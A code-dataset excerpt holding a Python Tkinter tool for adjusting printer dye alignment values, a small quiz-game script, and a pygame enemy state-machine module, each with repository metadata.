self.statusVar.set(UNSAVED_CHANGES)\n self.statusBar.configure(fg=\"black\")\n \n def increment_dye_0(self):\n val = self.dye_0_var.get()\n if val in GAP_VALUE_RANGE and val < 200:\n self.dye_0_var.set(val + 8)\n self.changed_dyes.add(0)\n 
self.mark_change()\n\n def decrement_dye_0(self):\n val = self.dye_0_var.get()\n if val in GAP_VALUE_RANGE and val > -200:\n self.dye_0_var.set(val - 8)\n self.changed_dyes.add(0)\n self.mark_change()\n\n def increment_dye_1(self):\n val = self.dye_1_var.get()\n if val in GAP_VALUE_RANGE and val < 200:\n self.dye_1_var.set(val + 8)\n self.changed_dyes.add(1)\n self.mark_change()\n\n def decrement_dye_1(self):\n val = self.dye_1_var.get()\n if val in GAP_VALUE_RANGE and val > -200:\n self.dye_1_var.set(val - 8)\n self.changed_dyes.add(1)\n self.mark_change()\n\n def increment_dye_2(self):\n val = self.dye_2_var.get()\n if val in GAP_VALUE_RANGE and val < 200:\n self.dye_2_var.set(val + 8)\n self.changed_dyes.add(2)\n self.mark_change()\n\n def decrement_dye_2(self):\n val = self.dye_2_var.get()\n if val in GAP_VALUE_RANGE and val > -200:\n self.dye_2_var.set(val - 8)\n self.changed_dyes.add(2)\n self.mark_change()\n\n def increment_dye_3(self):\n val = self.dye_3_var.get()\n if val in GAP_VALUE_RANGE and val < 200:\n self.dye_3_var.set(val + 8)\n self.changed_dyes.add(3)\n self.mark_change()\n\n def decrement_dye_3(self):\n val = self.dye_3_var.get()\n if val in GAP_VALUE_RANGE and val > -200:\n self.dye_3_var.set(val - 8)\n self.changed_dyes.add(3)\n self.mark_change()\n\n def increment_dye_4(self):\n val = self.dye_4_var.get()\n if val in GAP_VALUE_RANGE and val < 200:\n self.dye_4_var.set(val + 8)\n self.changed_dyes.add(4)\n self.mark_change()\n\n def decrement_dye_4(self):\n val = self.dye_4_var.get()\n if val in GAP_VALUE_RANGE and val > -200:\n self.dye_4_var.set(val - 8)\n self.changed_dyes.add(4)\n self.mark_change()\n\n def increment_dye_5(self):\n val = self.dye_5_var.get()\n if val in GAP_VALUE_RANGE and val < 200:\n self.dye_5_var.set(val + 8)\n self.changed_dyes.add(5)\n self.mark_change()\n\n def decrement_dye_5(self):\n val = self.dye_5_var.get()\n if val in GAP_VALUE_RANGE and val > -200:\n self.dye_5_var.set(val - 8)\n self.changed_dyes.add(5)\n self.mark_change()\n\n def increment_dye_6(self):\n val = self.dye_6_var.get()\n if val in GAP_VALUE_RANGE and val < 200:\n self.dye_6_var.set(val + 8)\n self.changed_dyes.add(6)\n self.mark_change()\n\n def decrement_dye_6(self):\n val = self.dye_6_var.get()\n if val in GAP_VALUE_RANGE and val > -200:\n self.dye_6_var.set(val - 8)\n self.changed_dyes.add(6)\n self.mark_change()\n\n def increment_dye_7(self):\n val = self.dye_7_var.get()\n if val in GAP_VALUE_RANGE and val < 200:\n self.dye_7_var.set(val + 8)\n self.changed_dyes.add(7)\n self.mark_change()\n\n def decrement_dye_7(self):\n val = self.dye_7_var.get()\n if val in GAP_VALUE_RANGE and val > -200:\n self.dye_7_var.set(val - 8)\n self.changed_dyes.add(7)\n self.mark_change()\n\n def increment_dye_8(self):\n val = self.dye_8_var.get()\n if val in GAP_VALUE_RANGE and val < 200:\n self.dye_8_var.set(val + 8)\n self.changed_dyes.add(8)\n self.mark_change()\n\n def decrement_dye_8(self):\n val = self.dye_8_var.get()\n if val in GAP_VALUE_RANGE and val > -200:\n self.dye_8_var.set(val - 8)\n self.changed_dyes.add(8)\n self.mark_change()\n\n def increment_dye_9(self):\n val = self.dye_9_var.get()\n if val in GAP_VALUE_RANGE and val < 200:\n self.dye_9_var.set(val + 8)\n self.changed_dyes.add(9)\n self.mark_change()\n\n def decrement_dye_9(self):\n val = self.dye_9_var.get()\n if val in GAP_VALUE_RANGE and val > -200:\n self.dye_9_var.set(val - 8)\n self.changed_dyes.add(9)\n self.mark_change()\n\n def increment_dye_10(self):\n val = self.dye_10_var.get()\n if val in 
GAP_VALUE_RANGE and val < 200:\n self.dye_10_var.set(val + 8)\n self.changed_dyes.add(10)\n self.mark_change()\n\n def decrement_dye_10(self):\n val = self.dye_10_var.get()\n if val in GAP_VALUE_RANGE and val > -200:\n self.dye_10_var.set(val - 8)\n self.changed_dyes.add(10)\n self.mark_change()\n\n def increment_dye_11(self):\n val = self.dye_11_var.get()\n if val in GAP_VALUE_RANGE and val < 200:\n self.dye_11_var.set(val + 8)\n self.changed_dyes.add(11)\n self.mark_change()\n\n def decrement_dye_11(self):\n val = self.dye_11_var.get()\n if val in GAP_VALUE_RANGE and val > -200:\n self.dye_11_var.set(val - 8)\n self.changed_dyes.add(11)\n self.mark_change()\n\n def increment_dye_12(self):\n val = self.dye_12_var.get()\n if val in GAP_VALUE_RANGE and val < 200:\n self.dye_12_var.set(val + 8)\n self.changed_dyes.add(12)\n self.mark_change()\n\n def decrement_dye_12(self):\n val = self.dye_12_var.get()\n if val in GAP_VALUE_RANGE and val > -200:\n self.dye_12_var.set(val - 8)\n self.changed_dyes.add(12)\n self.mark_change()\n\n def increment_dye_13(self):\n val = self.dye_13_var.get()\n if val in GAP_VALUE_RANGE and val < 200:\n self.dye_13_var.set(val + 8)\n self.changed_dyes.add(13)\n self.mark_change()\n\n def decrement_dye_13(self):\n val = self.dye_13_var.get()\n if val in GAP_VALUE_RANGE and val > -200:\n self.dye_13_var.set(val - 8)\n self.changed_dyes.add(13)\n self.mark_change()\n\n def validate_gap_value(self, num):\n try:\n num = int(num)\n except:\n return 0\n if num in GAP_VALUE_RANGE:\n return num\n if num > 200:\n return 200\n if num < -200:\n return -200\n for i in GAP_VALUE_RANGE:\n if i > num:\n return i\n\n def load_APA_file(self):\n sys_drive = os.getenv(\"SYSTEMDRIVE\")\n if not sys_drive:\n sys_drive = \"C:\"\n sys_drive = os.path.join(sys_drive)\n path = filedialog.askopenfilename(title = \"Load apa_data.pcl file\", initialdir=sys_drive, filetypes = [(\"APA Data File\", \"*.pcl\")])\n if path:\n if self.parse_APA_file(path):\n self.save_button[\"state\"] = \"normal\"\n self.dye_0_lab.configure(fg=\"blue\")\n self.dye_1_lab.configure(fg=\"blue\")\n self.dye_2_lab.configure(fg=\"blue\")\n self.dye_3_lab.configure(fg=\"blue\")\n self.dye_4_lab.configure(fg=\"blue\")\n self.dye_5_lab.configure(fg=\"blue\")\n self.dye_6_lab.configure(fg=\"blue\")\n self.dye_7_lab.configure(fg=\"blue\")\n self.dye_8_lab.configure(fg=\"blue\")\n self.dye_9_lab.configure(fg=\"blue\")\n self.dye_10_lab.configure(fg=\"blue\")\n self.dye_11_lab.configure(fg=\"blue\")\n self.dye_12_lab.configure(fg=\"blue\")\n self.dye_13_lab.configure(fg=\"blue\")\n self.dye_0_inc[\"state\"] = \"normal\"\n self.dye_0_dec[\"state\"] = \"normal\"\n self.dye_1_inc[\"state\"] = \"normal\"\n self.dye_1_dec[\"state\"] = \"normal\"\n self.dye_2_inc[\"state\"] = \"normal\"\n self.dye_2_dec[\"state\"] = \"normal\"\n self.dye_3_inc[\"state\"] = \"normal\"\n self.dye_3_dec[\"state\"] = \"normal\"\n self.dye_4_inc[\"state\"] = \"normal\"\n self.dye_4_dec[\"state\"] = \"normal\"\n self.dye_5_inc[\"state\"] = \"normal\"\n self.dye_5_dec[\"state\"] = \"normal\"\n self.dye_6_inc[\"state\"] = \"normal\"\n self.dye_6_dec[\"state\"] = \"normal\"\n self.dye_7_inc[\"state\"] = \"normal\"\n self.dye_7_dec[\"state\"] = \"normal\"\n self.dye_8_inc[\"state\"] = \"normal\"\n self.dye_8_dec[\"state\"] = \"normal\"\n self.dye_9_inc[\"state\"] = \"normal\"\n self.dye_9_dec[\"state\"] = \"normal\"\n self.dye_10_inc[\"state\"] = \"normal\"\n self.dye_10_dec[\"state\"] = \"normal\"\n self.dye_11_inc[\"state\"] = \"normal\"\n 
self.dye_11_dec[\"state\"] = \"normal\"\n self.dye_12_inc[\"state\"] = \"normal\"\n self.dye_12_dec[\"state\"] = \"normal\"\n self.dye_13_inc[\"state\"] = \"normal\"\n self.dye_13_dec[\"state\"] = \"normal\"\n self.statusBar.configure(fg=\"blue\")\n self.statusVar.set(FILE_LOAD_SUCCESSFULL)\n\n def parse_APA_file(self, path):\n if not os.path.exists(path):\n return False\n dye_values = {}\n with open(path, \"r\") as f:\n content = f.read()\n for line in content.split(\"\\n\"):\n if \"oem_set_alignment_values\" in line:\n values = get_raw_line_values(line)\n if values[0] == \"0\" and values[3] == \"0\":\n try:\n dye_values[int(values[2])] = int(values[4])\n except:\n return False\n if len(dye_values) != 14:\n return False\n for dye, value in dye_values.items():\n if dye == 0:\n self.dye_0_var.set(self.validate_gap_value(value))\n elif dye == 1:\n self.dye_1_var.set(self.validate_gap_value(value))\n elif dye == 2:\n self.dye_2_var.set(self.validate_gap_value(value))\n elif dye == 3:\n self.dye_3_var.set(self.validate_gap_value(value))\n elif dye == 4:\n self.dye_4_var.set(self.validate_gap_value(value))\n elif dye == 5:\n self.dye_5_var.set(self.validate_gap_value(value))\n elif dye == 6:\n self.dye_6_var.set(self.validate_gap_value(value))\n elif dye == 7:\n self.dye_7_var.set(self.validate_gap_value(value))\n elif dye == 8:\n self.dye_8_var.set(self.validate_gap_value(value))\n elif dye == 9:\n self.dye_9_var.set(self.validate_gap_value(value))\n elif dye == 10:\n self.dye_10_var.set(self.validate_gap_value(value))\n elif dye == 11:\n self.dye_11_var.set(self.validate_gap_value(value))\n elif dye == 12:\n self.dye_12_var.set(self.validate_gap_value(value))\n elif dye == 13:\n self.dye_13_var.set(self.validate_gap_value(value))\n return True\n\n def update_dye(self, dye):\n if dye < 0 or 13 < dye:\n return False\n dye_value = self.dye_vars[dye].get()\n for color in range(0, 4):\n if not set_dye(dye, color, dye_value):\n return False\n sleep(0.1)\n return True\n\n def save_changes(self):\n if not self.has_changed:\n return\n for dye in self.changed_dyes:\n if not self.update_dye(dye):\n self.statusVar.set(FILE_SAVE_UNSUCCESSFULL)\n self.statusBar.configure(fg=\"red\")\n return\n self.changed_dyes = set()\n self.has_changed = False\n self.statusVar.set(FILE_SAVE_SUCCESSFULL)\n self.statusBar.configure(fg=\"blue\")\n\n def mainloop(self):\n self.root.mainloop()\n\n\nif __name__ == \"__main__\":\n DGATool = DyeGapAdjustmentTool()\n DGATool.mainloop()\n", "repo_name": "ronny-toribio/DGAT", "sub_path": "dgat2.py", "file_name": "dgat2.py", "file_ext": "py", "file_size_in_byte": 30603, "program_lang": "python", "lang": "en", "doc_type": "code", "stars": 0, "dataset": "github-code", "pt": "52", "api": [{"api_name": "requests.post", "line_number": 79, "usage_type": "call"}, {"api_name": "tkinter.messagebox.showinfo", "line_number": 81, "usage_type": "call"}, {"api_name": "tkinter.messagebox", "line_number": 81, "usage_type": "name"}, {"api_name": "tkinter.Tk", "line_number": 92, "usage_type": "call"}, {"api_name": "tkinter.Menu", "line_number": 108, "usage_type": "call"}, {"api_name": "tkinter.Menu", "line_number": 109, "usage_type": "call"}, {"api_name": "tkinter.Menu", "line_number": 115, "usage_type": "call"}, {"api_name": "tkinter.messagebox.showinfo", "line_number": 116, "usage_type": "call"}, {"api_name": "tkinter.messagebox", "line_number": 116, "usage_type": "name"}, {"api_name": "tkinter.Frame", "line_number": 121, "usage_type": "call"}, {"api_name": "tkinter.Frame", "line_number": 123, 
"usage_type": "call"}, {"api_name": "tkinter.Frame", "line_number": 125, "usage_type": "call"}, {"api_name": "tkinter.BOTTOM", "line_number": 126, "usage_type": "attribute"}, {"api_name": "tkinter.X", "line_number": 126, "usage_type": "attribute"}, {"api_name": "tkinter.StringVar", "line_number": 129, "usage_type": "call"}, {"api_name": "tkinter.Label", "line_number": 130, "usage_type": "call"}, {"api_name": "tkinter.SUNKEN", "line_number": 130, "usage_type": "attribute"}, {"api_name": "tkinter.W", "line_number": 130, "usage_type": "attribute"}, {"api_name": "tkinter.IntVar", "line_number": 135, "usage_type": "call"}, {"api_name": "tkinter.ttk.LabelFrame", "line_number": 137, "usage_type": "call"}, {"api_name": "tkinter.ttk", "line_number": 137, "usage_type": "name"}, {"api_name": "tkinter.Label", "line_number": 139, "usage_type": "call"}, {"api_name": "tkinter.Button", "line_number": 141, "usage_type": "call"}, {"api_name": "tkinter.Button", "line_number": 144, "usage_type": "call"}, {"api_name": "tkinter.IntVar", "line_number": 149, "usage_type": "call"}, {"api_name": "tkinter.ttk.LabelFrame", "line_number": 151, "usage_type": "call"}, {"api_name": "tkinter.ttk", "line_number": 151, "usage_type": "name"}, {"api_name": "tkinter.Label", "line_number": 153, "usage_type": "call"}, {"api_name": "tkinter.Button", "line_number": 155, "usage_type": "call"}, {"api_name": "tkinter.Button", "line_number": 158, "usage_type": "call"}, {"api_name": "tkinter.IntVar", "line_number": 163, "usage_type": "call"}, {"api_name": "tkinter.ttk.LabelFrame", "line_number": 165, "usage_type": "call"}, {"api_name": "tkinter.ttk", "line_number": 165, "usage_type": "name"}, {"api_name": "tkinter.Label", "line_number": 167, "usage_type": "call"}, {"api_name": "tkinter.Button", "line_number": 169, "usage_type": "call"}, {"api_name": "tkinter.Button", "line_number": 172, "usage_type": "call"}, {"api_name": "tkinter.IntVar", "line_number": 177, "usage_type": "call"}, {"api_name": "tkinter.ttk.LabelFrame", "line_number": 179, "usage_type": "call"}, {"api_name": "tkinter.ttk", "line_number": 179, "usage_type": "name"}, {"api_name": "tkinter.Label", "line_number": 181, "usage_type": "call"}, {"api_name": "tkinter.Button", "line_number": 183, "usage_type": "call"}, {"api_name": "tkinter.Button", "line_number": 186, "usage_type": "call"}, {"api_name": "tkinter.IntVar", "line_number": 191, "usage_type": "call"}, {"api_name": "tkinter.ttk.LabelFrame", "line_number": 193, "usage_type": "call"}, {"api_name": "tkinter.ttk", "line_number": 193, "usage_type": "name"}, {"api_name": "tkinter.Label", "line_number": 196, "usage_type": "call"}, {"api_name": "tkinter.Button", "line_number": 198, "usage_type": "call"}, {"api_name": "tkinter.Button", "line_number": 201, "usage_type": "call"}, {"api_name": "tkinter.IntVar", "line_number": 206, "usage_type": "call"}, {"api_name": "tkinter.ttk.LabelFrame", "line_number": 208, "usage_type": "call"}, {"api_name": "tkinter.ttk", "line_number": 208, "usage_type": "name"}, {"api_name": "tkinter.Label", "line_number": 210, "usage_type": "call"}, {"api_name": "tkinter.Button", "line_number": 212, "usage_type": "call"}, {"api_name": "tkinter.Button", "line_number": 215, "usage_type": "call"}, {"api_name": "tkinter.IntVar", "line_number": 220, "usage_type": "call"}, {"api_name": "tkinter.ttk.LabelFrame", "line_number": 222, "usage_type": "call"}, {"api_name": "tkinter.ttk", "line_number": 222, "usage_type": "name"}, {"api_name": "tkinter.Label", "line_number": 224, "usage_type": "call"}, {"api_name": 
"tkinter.Button", "line_number": 226, "usage_type": "call"}, {"api_name": "tkinter.Button", "line_number": 229, "usage_type": "call"}, {"api_name": "tkinter.IntVar", "line_number": 234, "usage_type": "call"}, {"api_name": "tkinter.ttk.LabelFrame", "line_number": 236, "usage_type": "call"}, {"api_name": "tkinter.ttk", "line_number": 236, "usage_type": "name"}, {"api_name": "tkinter.Label", "line_number": 238, "usage_type": "call"}, {"api_name": "tkinter.Button", "line_number": 240, "usage_type": "call"}, {"api_name": "tkinter.Button", "line_number": 243, "usage_type": "call"}, {"api_name": "tkinter.IntVar", "line_number": 248, "usage_type": "call"}, {"api_name": "tkinter.ttk.LabelFrame", "line_number": 250, "usage_type": "call"}, {"api_name": "tkinter.ttk", "line_number": 250, "usage_type": "name"}, {"api_name": "tkinter.Label", "line_number": 252, "usage_type": "call"}, {"api_name": "tkinter.Button", "line_number": 254, "usage_type": "call"}, {"api_name": "tkinter.Button", "line_number": 257, "usage_type": "call"}, {"api_name": "tkinter.IntVar", "line_number": 262, "usage_type": "call"}, {"api_name": "tkinter.ttk.LabelFrame", "line_number": 264, "usage_type": "call"}, {"api_name": "tkinter.ttk", "line_number": 264, "usage_type": "name"}, {"api_name": "tkinter.Label", "line_number": 266, "usage_type": "call"}, {"api_name": "tkinter.Button", "line_number": 268, "usage_type": "call"}, {"api_name": "tkinter.Button", "line_number": 271, "usage_type": "call"}, {"api_name": "tkinter.IntVar", "line_number": 276, "usage_type": "call"}, {"api_name": "tkinter.ttk.LabelFrame", "line_number": 278, "usage_type": "call"}, {"api_name": "tkinter.ttk", "line_number": 278, "usage_type": "name"}, {"api_name": "tkinter.Label", "line_number": 280, "usage_type": "call"}, {"api_name": "tkinter.Button", "line_number": 282, "usage_type": "call"}, {"api_name": "tkinter.Button", "line_number": 285, "usage_type": "call"}, {"api_name": "tkinter.IntVar", "line_number": 290, "usage_type": "call"}, {"api_name": "tkinter.ttk.LabelFrame", "line_number": 292, "usage_type": "call"}, {"api_name": "tkinter.ttk", "line_number": 292, "usage_type": "name"}, {"api_name": "tkinter.Label", "line_number": 294, "usage_type": "call"}, {"api_name": "tkinter.Button", "line_number": 296, "usage_type": "call"}, {"api_name": "tkinter.Button", "line_number": 299, "usage_type": "call"}, {"api_name": "tkinter.IntVar", "line_number": 304, "usage_type": "call"}, {"api_name": "tkinter.ttk.LabelFrame", "line_number": 306, "usage_type": "call"}, {"api_name": "tkinter.ttk", "line_number": 306, "usage_type": "name"}, {"api_name": "tkinter.Label", "line_number": 308, "usage_type": "call"}, {"api_name": "tkinter.Button", "line_number": 310, "usage_type": "call"}, {"api_name": "tkinter.Button", "line_number": 313, "usage_type": "call"}, {"api_name": "tkinter.IntVar", "line_number": 318, "usage_type": "call"}, {"api_name": "tkinter.ttk.LabelFrame", "line_number": 320, "usage_type": "call"}, {"api_name": "tkinter.ttk", "line_number": 320, "usage_type": "name"}, {"api_name": "tkinter.Label", "line_number": 322, "usage_type": "call"}, {"api_name": "tkinter.Button", "line_number": 324, "usage_type": "call"}, {"api_name": "tkinter.Button", "line_number": 327, "usage_type": "call"}, {"api_name": "tkinter.Button", "line_number": 351, "usage_type": "call"}, {"api_name": "tkinter.Button", "line_number": 353, "usage_type": "call"}, {"api_name": "os.path.exists", "line_number": 358, "usage_type": "call"}, {"api_name": "os.path", "line_number": 358, "usage_type": 
"attribute"}, {"api_name": "tkinter.PhotoImage", "line_number": 359, "usage_type": "call"}, {"api_name": "tkinter.PhotoImage", "line_number": 360, "usage_type": "call"}, {"api_name": "os.getenv", "line_number": 635, "usage_type": "call"}, {"api_name": "os.path.join", "line_number": 638, "usage_type": "call"}, {"api_name": "os.path", "line_number": 638, "usage_type": "attribute"}, {"api_name": "tkinter.filedialog.askopenfilename", "line_number": 639, "usage_type": "call"}, {"api_name": "tkinter.filedialog", "line_number": 639, "usage_type": "name"}, {"api_name": "os.path.exists", "line_number": 689, "usage_type": "call"}, {"api_name": "os.path", "line_number": 689, "usage_type": "attribute"}, {"api_name": "time.sleep", "line_number": 742, "usage_type": "call"}]} +{"seq_id": "8734832013", "text": "from data import question_data\nfrom question_model import Question\nfrom quiz_brain import QuizBrain\n\nnew_Question = []\nfor q in question_data:\n question_text = q[\"text\"]\n answer_answer = q[\"answer\"]\n n_Question = Question(question_text, answer_answer)\n new_Question.append(n_Question)\n\nquiz = QuizBrain(new_Question)\nwhile quiz.is_still_Question():\n quiz.nextQuestion()\n\nprint(\"You've completed the quiz.\")\nprint(f\"Your final score is: {quiz.score}/{quiz.question_number}\")\n", "repo_name": "tusharbhardwaj0001/100_days_of_code-Python", "sub_path": "Day 17/quiz-game/main.py", "file_name": "main.py", "file_ext": "py", "file_size_in_byte": 489, "program_lang": "python", "lang": "en", "doc_type": "code", "stars": 0, "dataset": "github-code", "pt": "52", "api": [{"api_name": "data.question_data", "line_number": 6, "usage_type": "name"}, {"api_name": "question_model.Question", "line_number": 9, "usage_type": "call"}, {"api_name": "quiz_brain.QuizBrain", "line_number": 12, "usage_type": "call"}]} +{"seq_id": "22867142527", "text": "import pygame as pg\nimport random\nimport math\nimport copy\nfrom settings import *\nfrom keyhandler import *\nfrom mechanics import *\nfrom imagemanager import *\n\nvec = pg.math.Vector2\n\nclass Mob(pg.sprite.Sprite):\n def __init__(self, game, x, y):\n self.groups = game.all_sprites, game.rect_sprites, game.mob_sprites\n pg.sprite.Sprite.__init__(self, self.groups)\n self.game = game\n self.x = x\n self.y = y\n self.vel = vec(0, 0)\n self.pos = vec(x, y)\n self.player_detected = False\n self.mob_class = \"Felltwin\"\n self.load_data()\n self.load_attributes()\n\n def load_data(self):\n self.states = {\"Idle\": Idle(self),\n \"Walk\": Walk(self),\n \"Attack\": Attack(self),\n \"GetHit\": GetHit(self),\n \"Die\": Die(self)}\n\n self.image_manager = ImageManager.get_instance()\n self.keyhandler = KeyHandler.get_instance()\n self.image_manager.load_mob_images(self.mob_class, self.states, self.keyhandler)\n self.state_name = \"Idle\"\n self.state = self.states[self.state_name]\n self.hit_rect = copy.copy(MOB_HIT_RECT)\n self.player_collision = False\n\n def load_attributes(self):\n self.totalhealth = self.currenthealth = self.previoushealth = 200\n self.damage = 40\n self.hit_rate = 100\n self.defense = 50\n self.level = 1\n\n def flip_state(self, state_name):\n \"\"\"Switch to the next game state.\"\"\"\n self.state.done[state_name] = False\n self.state_name = state_name\n persistent = self.state.persistence\n self.state = self.states[self.state_name]\n self.state.start_up(persistent)\n\n def events(self):\n self.state.events()\n\n def update(self, dt):\n for key, value in self.state.done.items():\n if value:\n self.flip_state(key)\n self.state.update(dt)\n 
self.image = self.state.image\n if self.currenthealth <= 0:\n return None\n if not hasattr(self, \"rect\"):\n self.rect = self.image.get_rect()\n self.health = Health(self.rect.width, 7)\n self.vel = self.state.vel\n self.pos.x += round(self.vel.x, 0)\n self.pos.y += round(self.vel.y, 0)\n self.hit_rect.centerx = self.pos.x\n if collide_hit_rect(self, self.game.player):\n self.player_collision = True\n detect_collision(self, self.game.rect_sprites, \"x\")\n self.hit_rect.centery = self.pos.y\n if collide_hit_rect(self, self.game.player):\n self.player_collision = True\n detect_collision(self, self.game.rect_sprites, \"y\")\n self.rect.center = self.hit_rect.center\n\n def detect_player(self):\n if self.pos.distance_to(self.game.player.pos) < 400:\n self.player_detected = True\n\n def gets_hit(self):\n if self.previoushealth > self.currenthealth:\n self.previoushealth = self.currenthealth\n return True\n return False\n\n def isdead(self):\n if self.currenthealth <= 0:\n self.previoushealth = self.currenthealth\n return True\n return False\n\n def draw_health(self, screen):\n ratio = self.currenthealth / self.totalhealth\n width = int(self.rect.width * ratio)\n self.health.set_width(width, 7)\n self.health.set_pos(self.rect.x, self.rect.y)\n self.health.get_color(ratio)\n screen.blit(self.health.image, self.game.camera.apply(self.health))\n\nclass MobState(pg.sprite.Sprite):\n def __init__(self, mob):\n pg.sprite.Sprite.__init__(self)\n self.image_manager = ImageManager.get_instance()\n self.keyhandler = KeyHandler.get_instance()\n self.game = mob.game\n self.mob = mob\n self.mob_class = mob.mob_class\n self.inital_data()\n\n def inital_data(self):\n self.current_frame = 0\n self.last_update = 0\n self.direction = \"down\"\n self.persistence = {\"direction\": self.direction}\n\n def start_up(self, direction_persistence):\n self.persistence = direction_persistence\n\n def events(self):\n pass\n\n def update(self, dt):\n pass\n\n def action(self, action_type, action_dir):\n self.last_dir = action_dir\n now = pg.time.get_ticks()\n if now - self.last_update > 100:\n self.last_update = now\n self.current_frame = (self.current_frame + 1) % len(action_type[action_dir])\n self.image = action_type[action_dir][self.current_frame]\n self.rect = self.image.get_rect()\n\nclass Idle(MobState):\n def __init__(self, mob):\n super().__init__(mob)\n self.done = {\"Walk\": False,\n \"Attack\": False,\n \"GetHit\": False,\n \"Die\": False}\n\n def start_up(self, persistence):\n self.persistence = persistence\n self.current_frame = 0\n self.direction = self.persistence[\"direction\"]\n\n def events(self):\n if self.mob.isdead():\n self.done[\"Die\"] = True\n elif self.mob.gets_hit():\n self.done[\"GetHit\"] = True\n elif self.mob.player_detected or (self.current_frame + 1) % len(self.image_manager.mob[self.mob_class][self.__class__.__name__][self.direction]) == 0:\n self.done[\"Walk\"] = True\n\n def update(self, dt):\n self.vel = vec(0, 0)\n self.mob.detect_player()\n self.action(self.image_manager.mob[self.mob_class][self.__class__.__name__], self.direction)\n\nclass Walk(MobState):\n def __init__(self, mob):\n super().__init__(mob)\n self.done = {\"Idle\": False,\n \"Attack\": False,\n \"GetHit\": False,\n \"Die\": False}\n\n def start_up(self, persistence):\n self.mob.player_collision = False\n self.persistence = persistence\n self.direction = self.persistence[\"direction\"]\n self.random_direction = self.keyhandler.get_key(random.randint(0, 7))\n self.distancia = 0\n\n def follow(self, dt):\n direction = 
\"\"\n distance_vector = (self.game.player.pos - self.mob.pos)\n distance_vector.x = round(distance_vector.x, 2)\n distance_vector.y = round(distance_vector.y, 2)\n for key, value in self.keyhandler.move_keys.items():\n if distance_vector.y != 0:\n distance_vector.y = math.copysign(1, distance_vector.y)\n direction += key if value[1] == distance_vector.y else \"\"\n for key, value in self.keyhandler.move_keys.items():\n if distance_vector.x != 0:\n distance_vector.x = math.copysign(1, distance_vector.x)\n direction += key if value[0] == distance_vector.x else \"\"\n self.vel = distance_vector * MOB_SPEED * dt\n\n return direction\n\n def events(self):\n if self.mob.isdead():\n self.done[\"Die\"] = True\n elif self.mob.gets_hit():\n self.done[\"GetHit\"] = True\n elif self.distancia >= 160 and not self.mob.player_detected:\n self.persistence[\"direction\"] = self.direction\n self.done[\"Idle\"] = True\n elif self.mob.player_collision:\n self.persistence[\"direction\"] = self.direction\n self.done[\"Attack\"] = True\n\n def update(self, dt):\n self.mob.detect_player()\n self.vel = vec(0, 0)\n if not self.mob.player_detected:\n self.direction = self.random_direction\n self.vel.x += self.keyhandler.vel_directions[self.random_direction][0] * MOB_SPEED * dt\n self.vel.y += self.keyhandler.vel_directions[self.random_direction][1] * MOB_SPEED * dt\n self.distancia += MOB_SPEED\n else:\n self.direction = self.follow(dt)\n\n if self.vel.x != 0 and self.vel.y != 0:\n self.distancia *= 1.4142\n self.vel *= 0.7071\n self.action(self.image_manager.mob[self.mob_class][self.__class__.__name__], self.direction)\n\nclass Attack(MobState):\n def __init__(self, mob):\n super().__init__(mob)\n self.done = {\"Idle\": False,\n \"Walk\": False,\n \"GetHit\": False,\n \"Die\": False}\n\n def start_up(self, persistence):\n self.persistence = persistence\n self.current_frame = 0\n self.direction = self.persistence[\"direction\"]\n\n def apply_damage(self):\n if not self.try_hit:\n self.try_hit = True\n if hit(self.mob.hit_rate, self.game.player.defense, self.mob.level, self.game.player.level):\n self.game.player.currenthealth -= self.mob.damage\n n = 1 - self.game.player.currenthealth/self.game.player.totalhealth\n self.game.hud.update(n, \"Life\")\n\n def events(self):\n if self.mob.isdead():\n self.done[\"Die\"] = True\n elif self.mob.gets_hit():\n self.done[\"GetHit\"] = True\n elif (self.current_frame + 1) % len(self.image_manager.mob[self.mob_class][self.__class__.__name__][self.direction]) == 0 and self.mob.pos.distance_to(self.game.player.pos) > 32:\n self.done[\"Idle\"] = True\n\n def update(self, dt):\n self.vel = vec(0, 0)\n if self.current_frame == 0:\n self.try_hit = False\n if self.current_frame == 10:\n self.apply_damage()\n self.action(self.image_manager.mob[self.mob_class][self.__class__.__name__], self.persistence[\"direction\"])\n\nclass GetHit(MobState):\n def __init__(self, mob):\n super().__init__(mob)\n self.done = {\"Idle\": False}\n\n def start_up(self, persistence):\n self.persistence = persistence\n self.current_frame = 0\n self.direction = self.persistence[\"direction\"]\n\n def events(self):\n if (self.current_frame + 1) % len(self.image_manager.mob[self.mob_class][self.__class__.__name__][self.direction]) == 0:\n self.done[\"Idle\"] = True\n\n def update(self, dt):\n self.vel = vec(0, 0)\n if self.mob.gets_hit():\n self.current_frame = 0\n self.action(self.image_manager.mob[self.mob_class][self.__class__.__name__], self.direction)\n\nclass Die(MobState):\n def __init__(self, mob):\n 
super().__init__(mob)\n self.hit_rect = pg.Surface((0, 0))\n self.finish = False\n self.done = {\"None\": None}\n\n def start_up(self, persistence):\n self.persistence = persistence\n self.current_frame = 0\n self.direction = self.persistence[\"direction\"]\n\n def update(self, dt):\n self.vel = vec(0, 0)\n if not self.finish:\n self.action(self.image_manager.mob[self.mob_class][self.__class__.__name__], self.direction)\n if self.current_frame == len(self.image_manager.mob[self.mob_class][self.__class__.__name__][self.direction]) - 1:\n self.finish = True\n self.mob.remove(self.mob.groups)\n self.mob.add(self.game.dead_sprites)\n\nclass Health:\n def __init__(self, width, height):\n self.image = pg.Surface((width, height))\n self.rect = self.image.get_rect()\n\n def get_color(self, ratio):\n if ratio > 0.6:\n self.image.fill(GREEN)\n elif ratio > 0.3:\n self.image.fill(YELLOW)\n else:\n self.image.fill(RED)\n\n def set_width(self, width, height):\n self.image = pg.Surface((width, height))\n self.rect = self.image.get_rect()\n\n def set_pos(self, x, y):\n self.rect.x = x\n self.rect.y = y\n", "repo_name": "Ricardo232/IS2-Grupo-F-Entregable-5", "sub_path": "IngenieriaSoftwareII-desarrollo/mobstate.py", "file_name": "mobstate.py", "file_ext": "py", "file_size_in_byte": 11573, "program_lang": "python", "lang": "en", "doc_type": "code", "stars": 0, "dataset": "github-code", "pt": "52", "api": [{"api_name": "pygame.math", "line_number": 10, "usage_type": "attribute"}, {"api_name": "pygame.sprite", "line_number": 12, "usage_type": "attribute"}, {"api_name": "pygame.sprite.Sprite.__init__", "line_number": 15, "usage_type": "call"}, {"api_name": "pygame.sprite", "line_number": 15, "usage_type": "attribute"}, {"api_name": "copy.copy", "line_number": 38, "usage_type": "call"}, {"api_name": "pygame.sprite", "line_number": 107, "usage_type": "attribute"}, {"api_name": "pygame.sprite.Sprite.__init__", "line_number": 109, "usage_type": "call"}, {"api_name": "pygame.sprite", "line_number": 109, "usage_type": "attribute"}, {"api_name": "pygame.time.get_ticks", "line_number": 134, "usage_type": "call"}, {"api_name": "pygame.time", "line_number": 134, "usage_type": "attribute"}, 